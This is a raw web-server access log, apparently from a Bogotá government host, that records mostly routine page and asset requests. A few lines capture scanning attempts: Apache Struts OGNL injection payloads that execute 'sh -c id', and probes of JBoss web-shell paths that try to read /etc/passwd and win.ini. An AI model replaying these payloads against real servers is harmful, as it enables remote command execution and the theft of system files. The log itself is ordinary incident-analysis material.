186.102.17.240 - - [21/Dec/2022:06:38:53 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+7zyE7/0vZL2qufs7VVz0bSx966SHFULhPpqX0KXTc5XD6aI1b+U1p HTTP/1.1" 200 31032
209.141.40.109 - - [21/Dec/2022:06:39:36 -0500] "GET / HTTP/1.1" 200 319
186.102.17.240 - - [21/Dec/2022:06:39:47 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18xj50JwVCUKebgo98ToD6A8BmQkwbqKbxR+DvY0DNWQhVNwq4WCw/E&y=U2FsdGVkX1+GgZ/f690xN37epJymJHi7ZzAbuw5zZ/wwH2MqcI6kzFgpxQzM0+jm HTTP/1.1" 200 31
186.102.17.240 - - [21/Dec/2022:06:39:55 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+N8Ma7AIX7SnSpUgP95LJDzdl0MkP51VZ+hS9w2eGnAivStmbz1MGU&y=U2FsdGVkX1+HqyikU7NTJ2csb8KdCAQGaW8mJOULIS9wxhrZY0f2RtHiJqEq1u2R HTTP/1.1" 200 30
186.102.17.240 - - [21/Dec/2022:06:39:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+eKdAaHvqYQIvR/xEJw1vOH5Xa4VvSyn1amAjnOxNqZB0wGfZ+ZbzHcpja3i7oCB6K61XTlPf7IdMNaMkfZnjMC9idxtUJor0=&u=U2FsdGVkX1+SJOhsDZOnlL2rDKFSjisl5o0dcOfZABY=&y=U2FsdGVkX1+HqyikU7NTJ2csb8KdCAQGaW8mJOULIS9wxhrZY0f2RtHiJqEq1u2R HTTP/1.1" 200 97
186.102.17.240 - - [21/Dec/2022:06:39:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+RcrNsGsckSUhPXDUbe1GpvepHtO+B4F6D4wihpU16JWI8tnoMsSZ0VZz+zZXTtcs2Kell6/koWrMn7M7zm4u2BK2PD9Wmr6i2zjU2GDRSVS2gGl8dGL6CigE6RqVsGNGBN8MckYDsI+RhtOhO1wQyDLjp4MLkin3l5McYDFd20gWebvb9b3W9jjLPx5cSlmj/iG2O5Y8RF13rLK4DCMhOpDcHaMd3omL/8cKVUP1O7GKdE2rap8qRi7xlDyVhnLX/79a68oZQGTg2EcT2N1onppr6liVIavlJ3wmy0ln28wiuDX0AQ2nHaZnXypUtYPUkvVwGUcuVkX5Z1CUITkc5F0zzoE4xQLv1SBeN81tRdJJmi8vt9QotqeTXnj44DQnpMbqE2FI45RmEUUfy66/AZP4JKw7UQdy7PKouD+NnQuvaXyNWyCzneWwwSCvDL/wW0RqkCReolJookYq3aGM4tncrp32MRRSGHNIj/TR6La3OytavsguZFCDiP4++Z+sxxUIdnABFgHGNdJwhbOvwuocR7xPPjPkGtDQklt6N8l8f3m4mI34wgkIc6bEk3sguC/gwrJnVS/yZhL0F3WwcOeKFwJoJx0RKPHiQntyWPTRDUvK9IyFY5VabFT+AdFrfEc4OZG3M3/grvT/+7Iz/wYNBIAyqMEK1v04VXEo8LfgCVvP3FcIBU5sbGI/bFNtU0uk0YnzrVpDhDGobFGHtUkEeQVgRjjVhdApcCr4taldAgA/Anj9Jsem14JKOjliT3Tgjj9zEqZCjz6XaEEsp3qBrvcOsDHDjtzekbLG24UtlCjeOaf/vQpzJJYj7Wjw/wDTsPvSiP+b7UqOv9bmlRmFRhmlENulBdxy5cemU/wRPH1rCyuUXGGMFVRuzY2m+wPyOxfysly7Tov2F4N8fSJ34S0dB/QDR/xg2NrrzuQoYO6gK0zw58cpgApV2v0k+Qu2ipNNbNNwRfOJM/J+DV7UaiCriDzaNBwechOmrtvhkRzsNdnUukiLeG2YuhvMy5rCUCYU4wvQLVX+YZzAe1q95crNwtG0QlQcr1Oe6TPcqoUOMSQ7kgFrih4ar4Tpqq5ICZWoAl9ZFgp1r/DvGIMl3iAeaSp0HzsuvQuYAxKtHn+KILuD57eV9OSyZjkVBLJBj0R5zEwp5sFr0Bz2nYALuADXcN3/svMr09/9cx/nordrQKjoCspy4sJyUq/WVghoebd7fusy1ym8lPO1VEhFsrDyIe/luT1mWRzj9hd2uxfftSnqY2kqHgykhejS+IcBjG8bsFH5+Dh0S6PNOz8eeFvmk9o1Q9vVc51tF1bGa8E0n0ApmBxjxaxDrCEWSWkH8o63SZQCEXwT/V53nKFcqfzF7IkAg85tWfz1WnBO3MZD3y4OYafFAv1E/9wvYZmyvjraa+63PEpTKuSMxl9O/XDkui6A=&u=U2FsdGVkX1+SJOhsDZOnlL2rDKFSjisl5o0dcOfZABY=&y=U2FsdGVkX1+HqyikU7NTJ2csb8KdCAQGaW8mJOULIS9wxhrZY0f2RtHiJqEq1u2R HTTP/1.1" 200 906
186.102.17.240 - - [21/Dec/2022:06:39:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/BR2hWsmp90uwWHNtxauF0SQUSA8QEQ5CJmUWRK7iIBzacuxdzq0muvAx7UTRfB1OEnaw3JvMtkQqZ5u/CcUYikerX7wr35UOea32XPN64HQqxFh4vB0wLODYlPTXMoC3UhYY5m2m9IGDgEgLxefkemR9Tze0/ZmzOPkHilh6p+sNvMNNSyR+rLMFIVvivCkMpjaDl2inO6FAptIvqlwQy9Fm+CXi3NA5Ki9v2v5SCf3joeAJbPaP/4GiPYholuEqzd0r4BE6gQEYzkNXDGeH6f4qeGWpFuily3C/dv3XdnbpAz1oPtPzn2HcUJadbFVamhwRvmGN5z0pKbIlQudSEtdWe/J7/KBY=&u=U2FsdGVkX1+SJOhsDZOnlL2rDKFSjisl5o0dcOfZABY=&y=U2FsdGVkX1+HqyikU7NTJ2csb8KdCAQGaW8mJOULIS9wxhrZY0f2RtHiJqEq1u2R HTTP/1.1" 200 196
186.102.17.240 - - [21/Dec/2022:06:39:56 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+N8Ma7AIX7SnSpUgP95LJDzdl0MkP51VZ+hS9w2eGnAivStmbz1MGU HTTP/1.1" 200 31032
201.245.192.253 - - [21/Dec/2022:06:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42464
201.245.192.253 - - [21/Dec/2022:06:40:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40615
45.79.136.154 - - [21/Dec/2022:06:40:58 -0500] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:03 -0500] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:05 -0500] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:09 -0500] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:13 -0500] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:17 -0500] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:21 -0500] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:25 -0500] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:06:41:29 -0500] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 1022
191.95.56.45 - - [21/Dec/2022:06:41:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 394296
172.22.2.4 - - [21/Dec/2022:06:42:12 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [21/Dec/2022:06:42:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
191.95.56.45 - - [21/Dec/2022:06:42:17 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
191.95.56.45 - - [21/Dec/2022:06:42:22 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 394296
172.22.2.4 - - [21/Dec/2022:06:40:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:06:42:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:06:41:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
172.104.27.41 - - [21/Dec/2022:06:43:26 -0500] "GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:06:43:30 -0500] "GET /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:06:43:34 -0500] "GET /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:06:43:38 -0500] "GET /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1034
216.245.221.92 - - [21/Dec/2022:06:43:40 -0500] "HEAD / HTTP/1.1" 200 -
172.104.27.41 - - [21/Dec/2022:06:43:42 -0500] "GET /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:06:43:46 -0500] "GET /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:06:43:50 -0500] "GET /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:06:43:54 -0500] "GET /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1" 404 1034
87.250.224.70 - - [21/Dec/2022:06:46:28 -0500] "-" 408 -
157.55.39.172 - - [21/Dec/2022:06:47:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20900-949.tif HTTP/1.1" 200 4091182
181.154.220.188 - - [21/Dec/2022:06:47:36 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
181.154.220.188 - - [21/Dec/2022:06:47:37 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [21/Dec/2022:06:47:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:06:46:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Dec/2022:06:48:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:47:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47659
201.245.192.253 - - [21/Dec/2022:06:52:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:06:53:40 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.198 - - [21/Dec/2022:06:53:55 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12508
172.22.2.4 - - [21/Dec/2022:06:52:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:53:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50149
95.108.213.26 - - [21/Dec/2022:06:56:28 -0500] "-" 408 -
201.245.192.253 - - [21/Dec/2022:06:57:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:06:58:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:58:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:06:59:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [21/Dec/2022:06:59:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 42583
172.22.2.4 - - [21/Dec/2022:07:00:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
179.43.187.243 - - [21/Dec/2022:07:02:39 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Dec/2022:07:02:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
128.14.133.58 - - [21/Dec/2022:07:02:59 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [21/Dec/2022:07:03:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:07:04:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.231.135 - - [21/Dec/2022:07:06:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:07:05:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
201.245.192.253 - - [21/Dec/2022:07:07:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:07:08:40 -0500] "HEAD / HTTP/1.1" 200 -
162.55.173.23 - - [21/Dec/2022:07:08:49 -0500] "GET / HTTP/1.1" 200 319
207.46.13.198 - - [21/Dec/2022:07:09:42 -0500] "GET /bla/resoluciones/notificaciones/autos%202020/2004.pdf HTTP/1.1" 304 -
157.55.39.172 - - [21/Dec/2022:07:11:01 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/3205.pdf HTTP/1.1" 304 -
172.22.2.4 - - [21/Dec/2022:07:10:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.59.2.19 - - [21/Dec/2022:07:11:47 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.59.2.19 - - [21/Dec/2022:07:11:48 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.59.2.19 - - [21/Dec/2022:07:11:48 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.59.2.19 - - [21/Dec/2022:07:11:48 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.59.2.19 - - [21/Dec/2022:07:11:48 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.59.2.19 - - [21/Dec/2022:07:11:48 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.59.2.19 - - [21/Dec/2022:07:12:12 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
201.244.197.70 - - [21/Dec/2022:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202019/2166.pdf HTTP/1.1" 200 254814
181.59.2.19 - - [21/Dec/2022:07:12:19 -0500] "POST /appsia/controlador HTTP/1.1" 200 7724
181.59.2.19 - - [21/Dec/2022:07:12:19 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [21/Dec/2022:07:10:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [21/Dec/2022:07:12:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
181.59.2.19 - - [21/Dec/2022:07:12:49 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
216.245.221.92 - - [21/Dec/2022:07:13:40 -0500] "HEAD / HTTP/1.1" 200 -
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
168.90.15.170 - - [21/Dec/2022:07:15:33 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
95.108.213.52 - - [21/Dec/2022:07:16:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:07:15:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
92.118.39.29 - - [21/Dec/2022:07:17:37 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Dec/2022:07:17:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
114.119.153.154 - - [21/Dec/2022:07:18:23 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:07:16:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
216.245.221.92 - - [21/Dec/2022:07:18:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:07:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42490
201.245.192.253 - - [21/Dec/2022:07:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40456
108.174.5.112 - - [21/Dec/2022:07:22:02 -0500] "GET /acuerdos-de-conservacion-firmados-en-la-reserva-van-der-hammen-empieza-a-dar-frutos.html HTTP/1.1" 206 843
201.245.192.253 - - [21/Dec/2022:07:22:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:07:21:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Dec/2022:07:23:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:07:22:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
116.203.250.97 - - [21/Dec/2022:07:24:35 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Dec/2022:07:27:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
87.250.224.85 - - [21/Dec/2022:07:28:06 -0500] "-" 408 -
216.245.221.92 - - [21/Dec/2022:07:28:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:07:29:12 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [21/Dec/2022:07:29:12 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [21/Dec/2022:07:29:12 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [21/Dec/2022:07:29:12 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [21/Dec/2022:07:29:12 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [21/Dec/2022:07:29:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [21/Dec/2022:07:27:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:07:29:18 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [21/Dec/2022:07:29:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 133572
201.245.192.253 - - [21/Dec/2022:07:29:21 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [21/Dec/2022:07:28:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
